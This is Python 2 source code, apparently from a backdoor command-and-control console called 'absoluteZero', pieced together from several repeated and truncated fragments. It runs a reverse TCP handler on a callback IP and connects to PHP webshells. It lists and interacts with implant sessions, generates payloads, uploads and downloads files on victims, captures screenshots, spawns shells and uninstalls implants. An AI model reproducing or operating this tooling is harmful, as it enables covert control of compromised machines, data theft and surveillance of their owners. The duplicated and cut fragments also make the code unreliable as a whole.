StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' ) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command.startswith('set '): try: _, argument, parameter = command.split(' ') if argument == "CALLBACK_IP": TCPhandler.Helper.InitializeIp(parameter) elif argument == "CALLBACK_PORTS": TCPhandler.Helper.InitializePorts(parameter) elif argument == "MAX_CONN": viewbag.MAX_CONN = int(parameter) print "MAX_CONN => " + parameter elif argument == "MESSAGE_LENGTH_SHOW": if parameter == 'True': viewbag.MESSAGE_LENGTH_SHOW = True else: viewbag.MESSAGE_LENGTH_SHOW = False print "MESSAGE_LENGTH_SHOW => " + parameter elif argument == "ENVIRONMENT_FOLDER": if tools.mkdir(parameter): viewbag.ENVIRONMENT_FOLDER = parameter print "ENVIRONMENT_FOLDER => " + parameter elif argument == "NOTIFY_CONNECTION": if parameter == 'True': viewbag.NOTIFY_CONNECTION = True else: viewbag.NOTIFY_CONNECTION = False print "NOTIFY_CONNECTION => " + parameter elif argument == "AUTOSTART_TCP": if parameter == 'True': viewbag.AUTOSTART_TCP = True else: viewbag.AUTOSTART_TCP = False print "AUTOSTART_TCP => " + parameter else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + 
str(e))
def Broadcast(string_):
    """Call Helper().send_msg(string_) once per entry in viewbag.all_connections.

    Any exception is printed and swallowed, which also ends the loop at the
    first failure.
    """
    try:
        # NOTE(review): the loop variable is not referenced in the body, and
        # send_msg is called here with one argument although other call sites
        # on this page pass a connection first.
        for connection in viewbag.all_connections:
            Helper().send_msg(string_)
    except Exception, e:
        print color.ReturnError('Broadcast error -> "%s"' % str(e))
def ImplantInteraction(index): print color.ReturnInfo( 'Deploying meta interpreter => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) connection = viewbag.all_connections[index] print color.ReturnInfo('Pinging Backdoor ...') try: Helper.send_msg(connection, ebytes.EBYTES.ping_byte) if Helper.recv_msg( connection) == ebytes.EBYTES.command_handling_byte: print color.ReturnSuccess( 'Backdoor returned code "\\x06", success.\n') while True: sys.stdout.write( color.ReturnImplantConsole('absoluteZero')) command = raw_input('') if command == "exit": if tools.Confirm('Close the current implant session?'): Helper.send_msg(connection, ebytes.EBYTES.exit_byte) print '' print color.ReturnError( 'Meta interpreter sessions closed => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) break else: continue elif command == "background": raise KeyboardInterrupt elif command == "uninstall": if tools.Confirm( 'Uninstall the implant from this target?'): Helper.send_msg(connection, ebytes.EBYTES.uninstall_byte) print '' print color.ReturnError( 'Meta interpreter sessions closed => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) print color.ReturnWarning( 'Uninstalling implant => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) if Helper.recv_msg( connection ) == ebytes.EBYTES.confirm_uninstall_byte: print color.ReturnSuccess( 'Implant uninstalled successfully.\n') break else: continue elif command == "modules": print "\n" + color.ReturnTabulate( modulehelper.ListModules(), ['Name', 'Description'], "simple") + "\n" continue elif command.startswith('download'): try: _, file_to_download, destination_folder = command.split( ' ') if not os.path.isdir(destination_folder): print color.ReturnError( "Error: folder '%s' doesn't exists." 
% destination_folder) continue else: if destination_folder[ -1:] == "\\" or destination_folder[ -1:] == "/": pass else: destination_folder += "\\" except ValueError: print color.ReturnError( 'Wrong arguments, Syntax: download <remote_file_path> <destination_folder_path>' ) continue Helper.send_msg( connection, base64.b64encode('download ' + file_to_download)) check = Helper.recv_msg(connection) print '' if check == ebytes.EBYTES.exit_byte: dst = destination_folder + os.path.basename( file_to_download) print color.ReturnInfo('Downloading: %s -> %s' % (file_to_download, dst)) Helper.send_msg(connection, ebytes.EBYTES.confirmation_byte) file_content = Helper.recv_msg_noenc(connection) try: if os.path.isfile(dst): os.remove(dst) f = open(dst, 'wb') f.write(file_content) f.close() print color.ReturnSuccess( 'Downloaded: %s -> %s\n' % (file_to_download, dst)) except IOError as e: print color.ReturnError( 'Download error: Permission denied for folder -> "%s"\n' % destination_folder) except Exception, e: print color.ReturnError( 'Download error: %s\n' % str(e)) continue elif check == ebytes.EBYTES.error_byte: print color.ReturnError( 'Error: file "%s" not found.\n' % file_to_download) continue elif command.startswith('upload'): try: _, file_to_upload, destination_folder = command.split( ' ') if os.path.isfile(file_to_upload): if destination_folder[ -1:] == "\\" or destination_folder[ -1:] == "/": pass else: destination_folder += "\\" Helper.send_msg( connection, base64.b64encode( 'upload ' + destination_folder + os.path.basename(file_to_upload))) check = Helper.recv_msg(connection) if check == ebytes.EBYTES.exit_byte: try: print '' print color.ReturnInfo( 'Uploading: %s -> %s' % (file_to_upload, destination_folder + os.path.basename(file_to_upload))) f = open(file_to_upload, 'rb') content = f.read() f.close() Helper.send_msg_noenc( connection, content) output_byte = Helper.recv_msg( connection) if output_byte != ebytes.EBYTES.confirmation_byte: print color.ReturnError( 
output_byte) else: print color.ReturnSuccess( 'Uploaded: %s -> %s\n' % (file_to_upload, destination_folder + os.path. basename(file_to_upload))) continue except Exception, e: Helper.send_msg( connection, ebytes.EBYTES.error_byte) print color.ReturnError( "Error uploading file '%s' -> %s\n" % (file_to_upload, str(e))) continue else: print color.ReturnError( 'Something wrong while uploading file "%s"\n' % file_to_upload) continue else: print color.ReturnError( "File '%s' doesn't exists.\n" % file_to_upload) continue except ValueError: print color.ReturnError( 'Wrong arguments, Syntax: upload <local_file_path> <destination_folder_path>' ) continue
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' 
) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e))
dst = viewbag.all_folders[index] + datetime.today( ).strftime('%Y_%m_%d-%H_%M_%S.png') print '' if check == ebytes.EBYTES.exit_byte: print color.ReturnInfo('Downloading screenshot...') Helper.send_msg(connection, ebytes.EBYTES.confirmation_byte) file_content = Helper.recv_msg(connection) try: f = open(dst, 'wb') f.write(file_content) f.close() print color.ReturnSuccess( 'Screenshot saved: %s\n' % dst) except Exception, e: print color.ReturnError( 'Screenshot error: %s\n' % str(e)) continue else: print color.ReturnError('Screenshot error: %s\n' % str(check)) elif command == "help": print help.help() else: if 'admin/shell::' in command: if not 'admin/shell_exec::' in command: Helper.send_msg(connection, ebytes.EBYTES.host_byte) Helper.shell_ip = Helper.recv_msg(connection) Helper.ShellHandler(index, connection, Helper.shell_ip)